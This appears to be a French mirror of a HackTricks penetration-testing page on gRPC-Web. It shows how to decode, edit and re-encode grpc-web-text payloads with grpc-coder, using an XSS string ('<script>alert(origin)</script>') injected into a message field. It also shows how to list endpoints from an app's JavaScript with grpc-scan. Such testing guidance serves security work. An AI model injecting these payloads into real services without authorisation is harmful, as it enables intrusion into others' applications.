mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
156 lines
9.3 KiB
Markdown
156 lines
9.3 KiB
Markdown
|
# Pentesting gRPC-Web
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou souhaitez-vous accéder à la **dernière version du PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
||
|
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
|
||
|
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-moi** sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
|
* **Partagez vos astuces de hacking en soumettant des PR au** [**dépôt hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**dépôt hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|
||
|
|
||
|
## **Manipulation des charges utiles gRPC-Web**
|
||
|
gRPC-Web utilise Content-Type: `application/grpc-web-text` dans les requêtes, qui est une sorte de protobuf sous forme encodée en base64. Vous pouvez utiliser l'outil [gprc-coder](https://github.com/nxenon/grpc-pentest-suite), et vous pouvez également installer son [Extension Burp Suite](https://github.com/nxenon/grpc-pentest-suite).
|
||
|
|
||
|
### **Manuel avec l'outil gGRPC Coder**
|
||
|
1. D'abord, décodez la charge utile :
|
||
|
```bash
|
||
|
echo "AAAAABYSC0FtaW4gTmFzaXJpGDY6BVhlbm9u" | python3 grpc-coder.py --decode --type grpc-web-text | protoscope > out.txt
|
||
|
```
|
||
|
2. Modifier le contenu du payload décodé
|
||
|
```
|
||
|
nano out.txt
|
||
|
2: {"Amin Nasiri Xenon GRPC"}
|
||
|
3: 54
|
||
|
7: {"<script>alert(origin)</script>"}
|
||
|
```
|
||
|
3. Encoder le nouveau payload
|
||
|
```bash
|
||
|
protoscope -s out.txt | python3 grpc-coder.py --encode --type grpc-web-text
|
||
|
```
|
||
|
4. Utilisez la sortie dans l'intercepteur Burp :
|
||
|
```
|
||
|
AAAAADoSFkFtaW4gTmFzaXJpIFhlbm9uIEdSUEMYNjoePHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+
|
||
|
```
|
||
|
### **Manuel avec l'extension gRPC-Web Coder pour Burp Suite**
|
||
|
Vous pouvez utiliser l'extension gRPC-Web Coder pour Burp Suite dans [gRPC-Web Pentest Suite](https://github.com/nxenon/grpc-pentest-suite) qui est plus simple. Vous pouvez lire les instructions d'installation et d'utilisation dans son dépôt.
|
||
|
|
||
|
## **Analyse des fichiers Javascript gRPC-Web**
|
||
|
Il y a au moins un fichier Javascript dans chaque application gRPC-Web. Vous pouvez analyser le fichier pour trouver de nouveaux messages, points de terminaison et services. Essayez d'utiliser l'outil [gRPC-Scan](https://github.com/nxenon/grpc-pentest-suite).
|
||
|
1. Téléchargez le fichier Javascript gRPC-Web
|
||
|
2. Analysez-le avec grpc-scan.py :
|
||
|
```bash
|
||
|
python3 grpc-scan.py --file main.js
|
||
|
```
|
||
|
3. Analyser les résultats et tester les nouveaux points de terminaison et les nouveaux services :
|
||
|
```
|
||
|
Output:
|
||
|
Found Endpoints:
|
||
|
/grpc.gateway.testing.EchoService/Echo
|
||
|
/grpc.gateway.testing.EchoService/EchoAbort
|
||
|
/grpc.gateway.testing.EchoService/NoOp
|
||
|
/grpc.gateway.testing.EchoService/ServerStreamingEcho
|
||
|
/grpc.gateway.testing.EchoService/ServerStreamingEchoAbort
|
||
|
|
||
|
Found Messages:
|
||
|
|
||
|
grpc.gateway.testing.EchoRequest:
|
||
|
+------------+--------------------+--------------+
|
||
|
| Field Name | Field Type | Field Number |
|
||
|
+============+====================+==============+
|
||
|
| Message | Proto3StringField | 1 |
|
||
|
+------------+--------------------+--------------+
|
||
|
| Name | Proto3StringField | 2 |
|
||
|
+------------+--------------------+--------------+
|
||
|
| Age | Proto3IntField | 3 |
|
||
|
+------------+--------------------+--------------+
|
||
|
| IsAdmin | Proto3BooleanField | 4 |
|
||
|
+------------+--------------------+--------------+
|
||
|
| Weight | Proto3FloatField | 5 |
|
||
|
+------------+--------------------+--------------+
|
||
|
| Test | Proto3StringField | 6 |
|
||
|
+------------+--------------------+--------------+
|
||
|
| Test2 | Proto3StringField | 7 |
|
||
|
+------------+--------------------+--------------+
|
||
|
| Test3 | Proto3StringField | 16 |
|
||
|
+------------+--------------------+--------------+
|
||
|
| Test4 | Proto3StringField | 20 |
|
||
|
+------------+--------------------+--------------+
|
||
|
|
||
|
grpc.gateway.testing.EchoResponse:
|
||
|
+--------------+--------------------+--------------+
|
||
|
| Field Name | Field Type | Field Number |
|
||
|
+==============+====================+==============+
|
||
|
| Message | Proto3StringField | 1 |
|
||
|
+--------------+--------------------+--------------+
|
||
|
| Name | Proto3StringField | 2 |
|
||
|
+--------------+--------------------+--------------+
|
||
|
| Age | Proto3IntField | 3 |
|
||
|
+--------------+--------------------+--------------+
|
||
|
| IsAdmin | Proto3BooleanField | 4 |
|
||
|
+--------------+--------------------+--------------+
|
||
|
| Weight | Proto3FloatField | 5 |
|
||
|
+--------------+--------------------+--------------+
|
||
|
| Test | Proto3StringField | 6 |
|
||
|
+--------------+--------------------+--------------+
|
||
|
| Test2 | Proto3StringField | 7 |
|
||
|
+--------------+--------------------+--------------+
|
||
|
| Test3 | Proto3StringField | 16 |
|
||
|
+--------------+--------------------+--------------+
|
||
|
| Test4 | Proto3StringField | 20 |
|
||
|
+--------------+--------------------+--------------+
|
||
|
| MessageCount | Proto3IntField | 8 |
|
||
|
+--------------+--------------------+--------------+
|
||
|
|
||
|
grpc.gateway.testing.ServerStreamingEchoRequest:
|
||
|
+-----------------+-------------------+--------------+
|
||
|
| Field Name | Field Type | Field Number |
|
||
|
+=================+===================+==============+
|
||
|
| Message | Proto3StringField | 1 |
|
||
|
+-----------------+-------------------+--------------+
|
||
|
| MessageCount | Proto3IntField | 2 |
|
||
|
+-----------------+-------------------+--------------+
|
||
|
| MessageInterval | Proto3IntField | 3 |
|
||
|
+-----------------+-------------------+--------------+
|
||
|
|
||
|
grpc.gateway.testing.ServerStreamingEchoResponse:
|
||
|
+------------+-------------------+--------------+
|
||
|
| Field Name | Field Type | Field Number |
|
||
|
+============+===================+==============+
|
||
|
| Message | Proto3StringField | 1 |
|
||
|
+------------+-------------------+--------------+
|
||
|
|
||
|
grpc.gateway.testing.ClientStreamingEchoRequest:
|
||
|
+------------+-------------------+--------------+
|
||
|
| Field Name | Field Type | Field Number |
|
||
|
+============+===================+==============+
|
||
|
| Message | Proto3StringField | 1 |
|
||
|
+------------+-------------------+--------------+
|
||
|
|
||
|
grpc.gateway.testing.ClientStreamingEchoResponse:
|
||
|
+--------------+----------------+--------------+
|
||
|
| Field Name | Field Type | Field Number |
|
||
|
+==============+================+==============+
|
||
|
| MessageCount | Proto3IntField | 1 |
|
||
|
+--------------+----------------+--------------+
|
||
|
```
|
||
|
## Références
|
||
|
|
||
|
* [Article sur l'intrusion dans gRPC-Web par Amin Nasiri](https://infosecwriteups.com/hacking-into-grpc-web-a54053757a45)
|
||
|
* [Suite de Pentest gRPC-Web](https://github.com/nxenon/grpc-pentest-suite)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* Vous travaillez dans une **entreprise de cybersécurité** ? Vous souhaitez voir votre **entreprise annoncée dans HackTricks** ? ou souhaitez-vous accéder à la **dernière version du PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
||
|
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
|
||
|
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-moi** sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
|
* **Partagez vos astuces de hacking en soumettant des PR au** [**dépôt hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**dépôt hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|